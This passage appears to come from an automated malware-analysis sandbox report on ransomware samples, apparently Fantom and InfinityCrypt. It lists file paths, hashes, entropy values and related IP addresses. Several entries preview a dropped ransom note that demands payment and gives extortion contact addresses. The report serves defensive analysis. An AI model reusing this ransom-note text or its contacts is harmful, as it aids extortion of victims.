                                                                                                                                                cosmeticss.jarGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                WmWEBNxSDk.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                Receipt.jarGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
                                                                                                                                                uDNdxuGOJJ.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                6tZuVq6gtV.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                UDO_Device_Enrolment.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                ITSBi3J3ws.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
                                                                                                                                                Oya6cSyAWh.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                No context
                                                                                                                                                No context
                                                                                                                                                No context
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):144
                                                                                                                                                Entropy (8bit):6.657602518728316
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:/Mnj+3UDNYFGTAa9SY4sIJnu3V8531JjipA6WLUKeL5vyvYbu23jHjRyYH:knq3aNYy9+Ruu5PjipA6WLUKIiYC2TEG
                                                                                                                                                MD5:52594DF33CA397BD4AF04B068D525B31
                                                                                                                                                SHA1:436CEAD0D1E4AC7C95C118851AA52FF290815396
                                                                                                                                                SHA-256:4C4A907A775CAFE4D0ED03F91351CB69C5F10DE986A9DF3FE905A889197F2388
                                                                                                                                                SHA-512:0D5A5170AAD4487E8E5B5440F3CEB5896A28D11BB04691D7A8C537CC53AF81EC0FF997D6AF7228D6760DEFED25651E527CABA2ED5382E404B54932A5E7A6F9CE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:....s.=..F.,R.Z.3.}..f(.(....tS..qf..C.X.rW.F......'..r..H..............Q.....IA.''.{..|PD'o;.......Uy&..iG..)?[m;r..v.F\.....4.....\.w
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):5.75
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:cFCDpr/DYsEO0NlKJTHl5tnsn:c0DprLYsPl5ts
                                                                                                                                                MD5:3426BDA9799C2C9B105D3407A0AD3D71
                                                                                                                                                SHA1:0FD9D0A5D0C6DE2A0FC460DEF08E623E6E96CCF3
                                                                                                                                                SHA-256:437BFE048840C941CE2F1344E4C97C9721F19F608B9E899132E6BC6E8EC9383F
                                                                                                                                                SHA-512:1F643C592E944412287ECE256EEE5AF51B614B7D8373B28299F42B747F5CB178CDF1F69CABE2E5E79C6C2FBA17F9BEBCEF5BAB1E3D35C3FF3AC080DD1B9D71A9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.( +........#..f....+.....w.6.<.Q..p.....iP..Z.......$h.)$
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):423472
                                                                                                                                                Entropy (8bit):7.999595378706803
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:cLeANBIaTCrBpXK2tsF/+9hjfYUoDjZNPSX:cVNBLCdpXKCu2NK3ZU
                                                                                                                                                MD5:0EFA442D2A98DEADFAF554AF4907A911
                                                                                                                                                SHA1:89BD457F0E6812103878AC7D3A422383D7C64EC7
                                                                                                                                                SHA-256:D5382C75480F5E855537EF573C04DCF667EDB6C57B250A94F8BFF82A1C3DEC57
                                                                                                                                                SHA-512:D748F2967B3BF264EC161D86026753E7DD16C8A46F606FDD8EE7CC1987E209271E337B1CD0A427F5F16A2D7438C7323AF471FC61E5D61DFF95B35059B870072C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...Q+...,.`y.p..m)..Y.....k#...o..M..;.T...q.i.2k..W .c..p.......=:...8......zb.k.;..a..1..B...".1....K5......$..>w0.-..,...._.>.G......z...K.B%U.+"....(+..8N..Q.."....2&.......=....!..o..}..xP.. #)`A|.6LZ......:...X]..M^.>E%...5.NP...JD.}._.s...@.1.R...).3../.7....q..m..7WN@..#5......%..9...I...q...Z....P.YS.FE...4...(.../........;...Wo...;o......B....[g..........j.....?.>.Y...]z9u..3....:.].W..:.m.....H.....\6P...^."..../..C)x`....2./.?.C....^.c*S..Q.....J_m...L...4.F.nL{....\..D.....*pZ.....g?........|vm1....."..._.0..H..O...yN.vY_a........b..+X.....q6DMS......F.....$.....'..I.....&.:(I..].g]#.6..#.Z.....\6.]...../..k.\VB..>i.R.t&z...zv.Sa.....Ggy[.!....ml.%.....Euy..;..H3zP.#D...Q.KE..F.5.:.9.0...~.IJ..9}..Lr.n&.S.qV...Lb.8^...M|..{e \......0KxL.)Rf.7.}V(.+.=....?.....I.d..Lw....?U..xS>6)...[....>.q.h.%r.....;.K...{r./.E....|...R.ba7#.#I..f......'H.....b.x.u...Q.Xp..[....2.z ...\>.h..]..2./n!V.m..>.3....^..Xnr..0;k....FB\".v.h
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):84000
                                                                                                                                                Entropy (8bit):7.997888891193274
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:2LdZog/oTowvvFqR8LIVz8h1ooFf1niPwAwy4SqwHNLDaxabXCIJZGqpB9:QgRHlciIVm2ot10pj1D1xJZGyB9
                                                                                                                                                MD5:6E73AF1C72D648FA96B7F4E85499D835
                                                                                                                                                SHA1:B78AAAE3D75A5170D5A3AC930BF01C0294B6ED34
                                                                                                                                                SHA-256:840980A8C51884466D16FE759F9F2E0656C64AEFACA90C3818EA349ED73213A8
                                                                                                                                                SHA-512:25F984050878F09CD068AA61CFA159C3E1818B5E632D36C5BBE739B5F09D2EF4471BDDBA1B61FA4B834E484F61D318E57BA576CC168E1948D70BA94065CE0434
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...Q+...,.`y.p..m)..Y.....k#...o..M..;.T...q..'..r..T...|$U....D..8.^.n....s.m[W....p.Z.u...`.b@...kD.d..d.....<..^o.N.~..].ajP.(......3$..5..z........p..7.+K...Y2.*}.nXe......w>(.^f...0.T.i:9.4*H....o.h]9[....2...N....1......|.....|..YgI..k...'&F7...B(...S..:...\.]...&SS....]..K.#..D..2..........v...=lj:C..B.c_....oc.0l`....Y...N....U.`zb<.}J..L..2oW.....g...o. ..K...........&..@.L..\.V...N..f...7..^a../.2..7..mt*5.,O...J....U:..2~*.....,..2..g.5.Y\=./..N...B.....7..M...r.. .:...Wa.3..b...g.....E.?.$^j...g@:.......W.dh..I{...4..j,..pXj....`9.H.&.$Sf..OD...]...'.F......}.....6....D.f.r%..|..v3..P..O......y.!%......}...|n[./..L.`.k?J.pB.b..*.6!&........o..sI;S.S......LuF..e....G>Sa[..;..`..f..kB.}...;."....8..N......p&f.)Q.....q!......oK`.....F...i!f..Db......[..5.]9..B;y.GJS....a....:......bz@.x3..O...."I..K..V.";..r..i.*x.!f....z..Bf...U...v.yb....W`0...Y.&.Y.......b..X...S.........T.#2.G.jI.b..".....u>....$....2...V..sA...vp9.H.l.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):720
                                                                                                                                                Entropy (8bit):7.711056135357004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:thpzUuqU35yDhCLgQE00HyA5Dm0xs65x9w1yvvTI5Mq8SAMfsIJkJOPKQohuTNYd:vpguqzQ8300S85665x9Nc5M1SAMfsYkD
                                                                                                                                                MD5:A550D4A22DD7E618EC8335FB6B545A6D
                                                                                                                                                SHA1:0ADCB4282011E55AB2118A7AA8D4D4DCB32A212F
                                                                                                                                                SHA-256:49F346FE1DC33B4257ABB70D2AD3F886CB0A08B73C092B3CC9510D14ACFB38CF
                                                                                                                                                SHA-512:7AD47BE32638925FDE0BE9F099346DC0D9E51317FCBA95DE309CE8C99FC17BE15F0511768023191A1C9C71E8ED6396139D8EA9652AC3D0C40EAE08957041E87F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.9<sG.`........Aw....E72...+?]Y9S#...p.L<.[..+0....#..{.n..N...=<.mKv..A...\.W/.x.....}..^.N0t$....7S...$.6IX...$J...V..?A:....6../m....Y.Q.......*g.sh.Y.....6.c-|XD.je....1.w..^.qJ.yiY.J...B.w^..J...<Q..t.|NZk.d.<.....t.$.<]VM<.....7.Z.........w/>.'..i.&L(P,$...[J..T....M..[.~.k.c..'.0..*.....nx0~.:......`.._..U.'GGW.Q..T..v..... .L.qTd.&....$.:..stSW.........C...!.U.Jm.|H...m.KF....W.).,'..v.I..@...(.V.....#.C..)K.....u|"..I.......rz.]...2..PQ.e...L.Y..0..Y....@Z.<.6..*.yR.5...(^.E5.c.h..SM*..*`..RWI.%.GV..u..z*.2C..`a.K.:C.....Vk..*..<..B>A.\.ot.LgM..._L.Y.....d4).#..c...A....h....*...~.:....V...8\(..'........P[U...~.....1.[x[t.z1YD.G......06b.`.....S...Of...".~.CX...4.q...C.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33776
                                                                                                                                                Entropy (8bit):7.995454485688993
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:rV390riteg9m3zAl/Gr46hHfPYkHDuI87qRknKJ5dc4pU2nJ+iHHfTkkE:rdEeezSEj4kHSuRwu5djU2nJbHIkE
                                                                                                                                                MD5:24DF153AB52075FE3772AB021D4B05E8
                                                                                                                                                SHA1:4FA0319387BABBCB48D170E2ED1335393D91C13A
                                                                                                                                                SHA-256:8DB8FB41A7566D778076E1A4D807CBB8E152AF39C1372693EC062E09D29B5B3D
                                                                                                                                                SHA-512:C8FC74FDA093D41E0CEBD3AB6243BE05E3CFBF98FFBB4E7604F78F704ACEA3BC0AB6C85ED1D7690AE0B5BDB22A648DA034C979D7866CC1ABB39FF03DB198A652
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:s.T....8......;....9!M.L.$..P....:iPV...SE...:(.S.(._.N..J=..+..5.TO.Z....Z]......T.3fr.7.!.y..r^.c...'......8..6...u..r.m..T@d...G........;.....`..j_l..w.../D.i...m2..0(..5lX.=..A.$.I......"..!b....J...G...z!.?......lkl...Pz.L......T..J.|^....g..]..e..1_...3e.m....j...i...[4r.X...V...R.......5.2.\p.S...c..6>Q.D.0_..f..2.q?.k.](>.<.....X.r.\j.?......^.O^.sn...eu....#Z...C..@Q /zM~.p7Im=?.{.....d.K...R.r. .Z.{...n..iW.?.#9._.My.L{.*csW..a.gm...H..]..;;....=L..y...faQ2.d...g..s..s;._..D(..M..=.a..g..i...1...."D.7q.f.1EZ50.....F....G..\.)[.....N.=6:sO..v.p...~~..`<..}.D.............w.?(...].y..k......~.TVR]...".[x..S.k...:........L..J.C.m..*P.k)+....e..v...8wc..C......T..$../@.}U..LE...K].d.P..j....1...t.dP.,.L3....Po`'....[K........'.&iN.*.l...g|..Mx.._S.$O0.....;...-.m..}hw..3+...V..m....\.l ....5,.......Z.?W...h0....[.M..~?....=.G.KF...A... .b{..B.P..6.l.b..9RB..P.'...:...!IqQ..=.......2.....L...' ~..Xk,a,.B1..|...~..'..&.^.".U..j...jM.....bfO.@.+S..i.....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33776
                                                                                                                                                Entropy (8bit):7.995454485688993
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:rV390riteg9m3zAl/Gr46hHfPYkHDuI87qRknKJ5dc4pU2nJ+iHHfTkkE:rdEeezSEj4kHSuRwu5djU2nJbHIkE
                                                                                                                                                MD5:24DF153AB52075FE3772AB021D4B05E8
                                                                                                                                                SHA1:4FA0319387BABBCB48D170E2ED1335393D91C13A
                                                                                                                                                SHA-256:8DB8FB41A7566D778076E1A4D807CBB8E152AF39C1372693EC062E09D29B5B3D
                                                                                                                                                SHA-512:C8FC74FDA093D41E0CEBD3AB6243BE05E3CFBF98FFBB4E7604F78F704ACEA3BC0AB6C85ED1D7690AE0B5BDB22A648DA034C979D7866CC1ABB39FF03DB198A652
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:s.T....8......;....9!M.L.$..P....:iPV...SE...:(.S.(._.N..J=..+..5.TO.Z....Z]......T.3fr.7.!.y..r^.c...'......8..6...u..r.m..T@d...G........;.....`..j_l..w.../D.i...m2..0(..5lX.=..A.$.I......"..!b....J...G...z!.?......lkl...Pz.L......T..J.|^....g..]..e..1_...3e.m....j...i...[4r.X...V...R.......5.2.\p.S...c..6>Q.D.0_..f..2.q?.k.](>.<.....X.r.\j.?......^.O^.sn...eu....#Z...C..@Q /zM~.p7Im=?.{.....d.K...R.r. .Z.{...n..iW.?.#9._.My.L{.*csW..a.gm...H..]..;;....=L..y...faQ2.d...g..s..s;._..D(..M..=.a..g..i...1...."D.7q.f.1EZ50.....F....G..\.)[.....N.=6:sO..v.p...~~..`<..}.D.............w.?(...].y..k......~.TVR]...".[x..S.k...:........L..J.C.m..*P.k)+....e..v...8wc..C......T..$../@.}U..LE...K].d.P..j....1...t.dP.,.L3....Po`'....[K........'.&iN.*.l...g|..Mx.._S.$O0.....;...-.m..}hw..3+...V..m....\.l ....5,.......Z.?W...h0....[.M..~?....=.G.KF...A... .b{..B.P..6.l.b..9RB..P.'...:...!IqQ..=.......2.....L...' ~..Xk,a,.B1..|...~..'..&.^.".U..j...jM.....bfO.@.+S..i.....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33776
                                                                                                                                                Entropy (8bit):7.995454485688993
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:rV390riteg9m3zAl/Gr46hHfPYkHDuI87qRknKJ5dc4pU2nJ+iHHfTkkE:rdEeezSEj4kHSuRwu5djU2nJbHIkE
                                                                                                                                                MD5:24DF153AB52075FE3772AB021D4B05E8
                                                                                                                                                SHA1:4FA0319387BABBCB48D170E2ED1335393D91C13A
                                                                                                                                                SHA-256:8DB8FB41A7566D778076E1A4D807CBB8E152AF39C1372693EC062E09D29B5B3D
                                                                                                                                                SHA-512:C8FC74FDA093D41E0CEBD3AB6243BE05E3CFBF98FFBB4E7604F78F704ACEA3BC0AB6C85ED1D7690AE0B5BDB22A648DA034C979D7866CC1ABB39FF03DB198A652
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:s.T....8......;....9!M.L.$..P....:iPV...SE...:(.S.(._.N..J=..+..5.TO.Z....Z]......T.3fr.7.!.y..r^.c...'......8..6...u..r.m..T@d...G........;.....`..j_l..w.../D.i...m2..0(..5lX.=..A.$.I......"..!b....J...G...z!.?......lkl...Pz.L......T..J.|^....g..]..e..1_...3e.m....j...i...[4r.X...V...R.......5.2.\p.S...c..6>Q.D.0_..f..2.q?.k.](>.<.....X.r.\j.?......^.O^.sn...eu....#Z...C..@Q /zM~.p7Im=?.{.....d.K...R.r. .Z.{...n..iW.?.#9._.My.L{.*csW..a.gm...H..]..;;....=L..y...faQ2.d...g..s..s;._..D(..M..=.a..g..i...1...."D.7q.f.1EZ50.....F....G..\.)[.....N.=6:sO..v.p...~~..`<..}.D.............w.?(...].y..k......~.TVR]...".[x..S.k...:........L..J.C.m..*P.k)+....e..v...8wc..C......T..$../@.}U..LE...K].d.P..j....1...t.dP.,.L3....Po`'....[K........'.&iN.*.l...g|..Mx.._S.$O0.....;...-.m..}hw..3+...V..m....\.l ....5,.......Z.?W...h0....[.M..~?....=.G.KF...A... .b{..B.P..6.l.b..9RB..P.'...:...!IqQ..=.......2.....L...' ~..Xk,a,.B1..|...~..'..&.^.".U..j...jM.....bfO.@.+S..i.....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33776
                                                                                                                                                Entropy (8bit):7.995454485688993
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:rV390riteg9m3zAl/Gr46hHfPYkHDuI87qRknKJ5dc4pU2nJ+iHHfTkkE:rdEeezSEj4kHSuRwu5djU2nJbHIkE
                                                                                                                                                MD5:24DF153AB52075FE3772AB021D4B05E8
                                                                                                                                                SHA1:4FA0319387BABBCB48D170E2ED1335393D91C13A
                                                                                                                                                SHA-256:8DB8FB41A7566D778076E1A4D807CBB8E152AF39C1372693EC062E09D29B5B3D
                                                                                                                                                SHA-512:C8FC74FDA093D41E0CEBD3AB6243BE05E3CFBF98FFBB4E7604F78F704ACEA3BC0AB6C85ED1D7690AE0B5BDB22A648DA034C979D7866CC1ABB39FF03DB198A652
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:s.T....8......;....9!M.L.$..P....:iPV...SE...:(.S.(._.N..J=..+..5.TO.Z....Z]......T.3fr.7.!.y..r^.c...'......8..6...u..r.m..T@d...G........;.....`..j_l..w.../D.i...m2..0(..5lX.=..A.$.I......"..!b....J...G...z!.?......lkl...Pz.L......T..J.|^....g..]..e..1_...3e.m....j...i...[4r.X...V...R.......5.2.\p.S...c..6>Q.D.0_..f..2.q?.k.](>.<.....X.r.\j.?......^.O^.sn...eu....#Z...C..@Q /zM~.p7Im=?.{.....d.K...R.r. .Z.{...n..iW.?.#9._.My.L{.*csW..a.gm...H..]..;;....=L..y...faQ2.d...g..s..s;._..D(..M..=.a..g..i...1...."D.7q.f.1EZ50.....F....G..\.)[.....N.=6:sO..v.p...~~..`<..}.D.............w.?(...].y..k......~.TVR]...".[x..S.k...:........L..J.C.m..*P.k)+....e..v...8wc..C......T..$../@.}U..LE...K].d.P..j....1...t.dP.,.L3....Po`'....[K........'.&iN.*.l...g|..Mx.._S.$O0.....;...-.m..}hw..3+...V..m....\.l ....5,.......Z.?W...h0....[.M..~?....=.G.KF...A... .b{..B.P..6.l.b..9RB..P.'...:...!IqQ..=.......2.....L...' ~..Xk,a,.B1..|...~..'..&.^.".U..j...jM.....bfO.@.+S..i.....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33776
                                                                                                                                                Entropy (8bit):7.995454485688993
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:rV390riteg9m3zAl/Gr46hHfPYkHDuI87qRknKJ5dc4pU2nJ+iHHfTkkE:rdEeezSEj4kHSuRwu5djU2nJbHIkE
                                                                                                                                                MD5:24DF153AB52075FE3772AB021D4B05E8
                                                                                                                                                SHA1:4FA0319387BABBCB48D170E2ED1335393D91C13A
                                                                                                                                                SHA-256:8DB8FB41A7566D778076E1A4D807CBB8E152AF39C1372693EC062E09D29B5B3D
